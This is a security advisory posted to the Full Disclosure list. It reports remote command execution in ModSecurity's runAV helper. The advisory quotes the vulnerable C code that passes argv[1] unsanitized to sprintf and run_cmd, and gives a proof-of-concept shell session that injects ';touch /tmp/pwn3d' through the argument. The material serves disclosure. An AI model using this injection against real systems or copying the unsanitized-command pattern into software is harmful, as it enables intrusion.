[FD] runAV mod_security Remote Command Execution

Fri, 13 May 2016 08:45:37 -0700 

# Title : runAV mod_security Remote Command Execution
# Date : 13/05/2016
# Author : R-73eN
# Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP
Fri Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux
# Software :
https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/util/av-scanning/runAV
# Vendor : https://www.modsecurity.org/
# https://www.infogen.al/

# Title : runAV mod_security Remote Command Execution
# Date : 13/05/2016
# Author : R-73eN
# Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP Fri 
Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux
# Software : 
https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/util/av-scanning/runAV
# Vendor : https://www.modsecurity.org/
#  ___        __        ____                 _    _  
# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
#
#



#include "common.h"

main(int argc, char *argv[])
{
        char cmd[MAX_OUTPUT_SIZE];
        char output[MAX_OUTPUT_SIZE];
        int error;
        char *colon;
        char *keyword;

        if (argc > 1) {
                sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);
                output[0] = '\0';
                error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);

+++++++++++++++++ OTHER CODE +++++++++++++++++++++++++++++++++


The argv[1] parameter is passed unsanitized to a sprintf function which sends 
the formatted output to the cmd variable,
which is later passed as a parameter to a run_cmd function on line 14.
https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/av-scanning/runAV/runAV.c#L14

POC:

snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ 
./runAV "foo.php;touch /tmp/pwn3d"
sh: 1: /usr/bin/clamscan: not found
1 exec empty: OK
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ls 
-la /tmp/ | grep pwn3d
-rw-rw-r--  1 snort snort    0 Maj 13 16:45 pwn3d
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ 
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Reply via email to